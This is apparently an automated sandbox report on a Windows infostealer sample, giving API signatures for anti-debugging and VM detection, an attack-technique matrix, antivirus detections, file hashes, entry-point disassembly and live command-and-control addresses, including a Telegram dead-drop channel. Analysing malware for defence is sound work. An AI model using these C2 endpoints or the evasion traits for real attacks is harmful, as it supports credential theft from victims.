                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0073DE10
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_007316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007316D0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0073F6B0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00743EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00743EA0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0073DA80
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00731160 GetSystemInfo,ExitProcess,0_2_00731160
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000102F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeAPI call chain: ExitProcess graph end nodegraph_0-12401
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeAPI call chain: ExitProcess graph end nodegraph_0-12404
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeAPI call chain: ExitProcess graph end nodegraph_0-12423
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeAPI call chain: ExitProcess graph end nodegraph_0-12415
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeAPI call chain: ExitProcess graph end nodegraph_0-12444
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeAPI call chain: ExitProcess graph end nodegraph_0-12243
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0074AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0074AD48
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_007345C0 VirtualProtect ?,00000004,00000100,000000000_2_007345C0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00749860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00749860
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00749750 mov eax, dword ptr fs:[00000030h]0_2_00749750
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00747850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00747850
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0074AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0074AD48
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0074CEEA SetUnhandledExceptionFilter,0_2_0074CEEA
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0074B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0074B33A
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: BnxBRWQWhy.exe, type: SAMPLE
                      Source: Yara matchFile source: Process Memory Space: BnxBRWQWhy.exe PID: 6936, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00749600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00749600
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00747B90
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00746920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00746920
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00747850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00747850
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00747A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00747A30

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: BnxBRWQWhy.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.BnxBRWQWhy.exe.730000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.BnxBRWQWhy.exe.730000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2106325851.0000000000731000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: BnxBRWQWhy.exe PID: 6936, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BnxBRWQWhy.exe PID: 6936, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: BnxBRWQWhy.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.BnxBRWQWhy.exe.730000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.BnxBRWQWhy.exe.730000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2106325851.0000000000731000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: BnxBRWQWhy.exe PID: 6936, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BnxBRWQWhy.exe PID: 6936, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote ServicesData from Local System11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory21
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Process Injection
                      NTDS11
                      Process Discovery
                      Distributed Component Object ModelInput Capture14
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Account Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Owner/User Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem123
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      BnxBRWQWhy.exe50%ReversingLabsWin32.Trojan.Generic
                      BnxBRWQWhy.exe100%AviraTR/Crypt.XPACK.Gen7
                      BnxBRWQWhy.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%URL Reputationsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      t.me
                      149.154.167.99
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://91.214.78.145/false
                          unknown
                          https://t.me/hwlflcqshvwptrue
                            unknown
                            http://193.233.112.44/383ccd496f3c5eee.phptrue
                              unknown
                              http://193.233.112.44/true
                                unknown
                                https://t.me/hwlflcqshvwp/383ccd496f3c5eee.phptrue
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://91.214.78.145BnxBRWQWhy.exe, 00000000.00000003.2128523908.0000000001035000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://t.me/BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001006000.00000004.00000020.00020000.00000000.sdmptrue
                                      unknown
                                      http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0BnxBRWQWhy.exefalse
                                      • URL Reputation: safe
                                      unknown
                                      https://sectigo.com/CPS0BnxBRWQWhy.exefalse
                                      • URL Reputation: safe
                                      unknown
                                      http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#BnxBRWQWhy.exefalse
                                      • URL Reputation: safe
                                      unknown
                                      http://ocsp.sectigo.com0BnxBRWQWhy.exefalse
                                      • URL Reputation: safe
                                      unknown
                                      https://web.telegram.orgBnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001081000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000102F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://193.233.112.44BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001024000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmptrue
                                          unknown
                                          http://193.233.112.44/WBnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://193.233.112.44/383ccd496f3c5eee.php_lwBnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zBnxBRWQWhy.exefalse
                                              • URL Reputation: safe
                                              unknown
                                              http://91.214.78.145/5BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://91.214.78.145/xBnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://193.233.112.44/jBnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://193.233.112.44RnBnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://t.me/hwlflcqshvwpsBnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://193.233.112.44/tion:BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#BnxBRWQWhy.exefalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          91.214.78.145
                                                          unknownRussian Federation
                                                          49373FOTONTELECOM-STUB-ASFOTONTELECOMRUfalse
                                                          193.233.112.44
                                                          unknownRussian Federation
                                                          20549FREE-MPEIRUtrue
                                                          149.154.167.99
                                                          t.meUnited Kingdom
                                                          62041TELEGRAMRUtrue
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1525312
                                                          Start date and time:2024-10-04 00:56:06 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 4m 10s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:6
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:BnxBRWQWhy.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:ea6989e3a607d753377b05bae55140d8.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@1/0@1/3
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 20
                                                          • Number of non-executed functions: 84
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: BnxBRWQWhy.exe
                                                          No simulations
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          91.214.78.145NJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 91.214.78.145/
                                                          193.233.112.44NJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 193.233.112.44/383ccd496f3c5eee.php
                                                          149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                          • telegram.org/img/favicon.ico
                                                          http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                          • telegram.org/
                                                          http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                          • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                          http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                          • telegram.org/
                                                          http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                          • telegram.org/
                                                          http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                          • telegram.org/?setln=pl
                                                          http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                          • telegram.org/
                                                          http://telegram.dogGet hashmaliciousUnknownBrowse
                                                          • telegram.dog/
                                                          LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                          • t.me/cinoshibot
                                                          jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                          • t.me/cinoshibot
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          t.meNJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 149.154.167.99
                                                          gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                          • 149.154.167.99
                                                          dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                                          • 149.154.167.99
                                                          tcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                                          • 149.154.167.99
                                                          https://thebrasilians.hosted.phplist.com/lists/lt.php?tid=KkkFBgMBXQUHUEsCB1QHTwZWAFYbCQpVBx0EBQABCgADAgJXVl1FVAIAUVFdUVhPBgUCVBsEA1JVHQ8BW1cUUAQGV1cBAF1aUgNQHVAHBFEFBgVRGwEAVQEdAlcLUBQKBAEDHlMAAVILAVBQBwUDBAGet hashmaliciousUnknownBrowse
                                                          • 50.6.153.166
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 149.154.167.99
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 149.154.167.99
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 149.154.167.99
                                                          https://linke.to/pkmlogisticsGet hashmaliciousUnknownBrowse
                                                          • 162.159.153.4
                                                          https://form.asana.com/?k=SVzOAgf254NWBNm-dO6Wfg&d=1208255323046871Get hashmaliciousUnknownBrowse
                                                          • 50.6.153.2
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TELEGRAMRUNJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 149.154.167.99
                                                          enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                                                          • 149.154.167.220
                                                          1.cmdGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          2.cmdGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                          • 149.154.167.99
                                                          dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                                          • 149.154.167.99
                                                          KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          FOTONTELECOM-STUB-ASFOTONTELECOMRUNJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 91.214.78.145
                                                          kQ6mFXrgYq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • 91.214.78.75
                                                          PQmAnagsLM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • 91.214.78.75
                                                          z10Original-Copy.bat.exeGet hashmaliciousRemcosBrowse
                                                          • 91.214.78.17
                                                          FREE-MPEIRUNJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 193.233.112.44
                                                          file.exeGet hashmaliciousStealcBrowse
                                                          • 193.233.113.184
                                                          file.exeGet hashmaliciousStealcBrowse
                                                          • 193.233.113.184
                                                          file.exeGet hashmaliciousStealcBrowse
                                                          • 193.233.113.184
                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 193.233.113.184
                                                          SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
                                                          • 193.233.121.52
                                                          file.exeGet hashmaliciousDCRatBrowse
                                                          • 193.233.115.185
                                                          BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                          • 193.233.122.71
                                                          https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38Get hashmaliciousUnknownBrowse
                                                          • 193.233.84.115
                                                          https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38Get hashmaliciousPhisherBrowse
                                                          • 193.233.84.115
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                          • 149.154.167.99
                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 149.154.167.99
                                                          NJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 149.154.167.99
                                                          rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 149.154.167.99
                                                          app__v7.5.3_.msiGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.99
                                                          WarzoneCheat.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                          • 149.154.167.99
                                                          FACTURA-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 149.154.167.99
                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 149.154.167.99
                                                          Layer.exeGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.99
                                                          Layer.exeGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.99
                                                          No context
                                                          No created / dropped files found
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.408555467669457
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:BnxBRWQWhy.exe
                                                          File size:336'040 bytes
                                                          MD5:ea6989e3a607d753377b05bae55140d8
                                                          SHA1:5c67ca11e96875c9beb0d320170e000698a65148
                                                          SHA256:9e857e6656ff0d6da789faa05f9fb49c323bdcea03b0b7887bbac919122f32fb
                                                          SHA512:80b021d768456c797e8ff1e44f6e1c4699705917cb4b735d1286e470251c279cf4273fc0ff8360e77142bdec02e5213aa251a0cedfbb1bc315810ea89f32e1c2
                                                          SSDEEP:6144:gihi8LYtUokCulxMfpbLve/NlHWTAFQnE7w+Uw3NKR9hU/W93+z27:/UtUoH3RvA6EFO4wx8KRF93+i7
                                                          TLSH:42646C32F65018BDE4A2457C95DE5F299BB978320310CEDB53D00A851FE22F5ED39A2B
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...3..f...........
                                                          Icon Hash:2f232d67b7934633
                                                          Entrypoint:0x4169f0
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66FE8833 [Thu Oct 3 12:04:03 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:8e9e6de8c6aa184371108e1074479bb3
                                                          Signature Valid:false
                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                          Signature Validation Error:The digital signature of the object did not verify
                                                          Error Number:-2146869232
                                                          Not Before, Not After
                                                          • 16/01/2023 01:00:00 16/01/2026 00:59:59
                                                          Subject Chain
                                                          • CN=Avast Software s.r.o., O=Avast Software s.r.o., L=Praha, C=CZ
                                                          Version:3
                                                          Thumbprint MD5:88F0356B1045C86B3BE429E369E41C0B
                                                          Thumbprint SHA-1:22C7A21648690E1B610F1E964AFB3044EAE24335
                                                          Thumbprint SHA-256:8C5E3683E3D73A2E9C9452FC91757931A5333EAE9670BAF00874D3C8D6D6A52A
                                                          Serial:015A6BEC4D7F549FE525C852DF670E13
                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 4Ch
                                                          call 00007FB404BD07EAh
                                                          call 00007FB404BE7DE5h
                                                          push 00420AEFh
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007FB404BE8CB8h
                                                          call 00007FB404BCF743h
                                                          call 00007FB404BCF6CEh
                                                          call 00007FB404BCF679h
                                                          call 00007FB404BCF784h
                                                          call 00007FB404BE4CCFh
                                                          call 00007FB404BCF6EAh
                                                          call 00007FB404BE5DA5h
                                                          push eax
                                                          lea eax, dword ptr [ebp-4Ch]
                                                          push eax
                                                          push 00421110h
                                                          lea ecx, dword ptr [ebp-40h]
                                                          push ecx
                                                          call 00007FB404BE5E22h
                                                          push eax
                                                          lea edx, dword ptr [ebp-34h]
                                                          push edx
                                                          push 0042110Ch
                                                          lea eax, dword ptr [ebp-28h]
                                                          push eax
                                                          mov ecx, dword ptr [0064A540h]
                                                          push ecx
                                                          lea edx, dword ptr [ebp-1Ch]
                                                          push edx
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007FB404BE8ED1h
                                                          mov ecx, eax
                                                          call 00007FB404BE8ECAh
                                                          mov ecx, eax
                                                          call 00007FB404BE8EC3h
                                                          mov ecx, eax
                                                          call 00007FB404BE8EBCh
                                                          mov ecx, eax
                                                          call 00007FB404BE8EB5h
                                                          push eax
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007FB404BE8D9Ch
                                                          lea ecx, dword ptr [ebp-4Ch]
                                                          call 00007FB404BE8CF4h
                                                          lea ecx, dword ptr [ebp-40h]
                                                          call 00007FB404BE8CECh
                                                          lea ecx, dword ptr [ebp-34h]
                                                          call 00007FB404BE8CE4h
                                                          lea ecx, dword ptr [ebp-28h]
                                                          call 00007FB404BE8CDCh
                                                          lea ecx, dword ptr [ebp-1Ch]
                                                          call 00007FB404BE8CD4h
                                                          mov eax, 00000001h
                                                          test eax, eax
                                                          Programming Language:
                                                          • [C++] VS2010 build 30319
                                                          • [ASM] VS2010 build 30319
                                                          • [ C ] VS2010 build 30319
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [LNK] VS2010 build 30319
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2aa880x3c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2610000x292a.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x4f6000x2aa8.data
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x25c0000x24e0.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
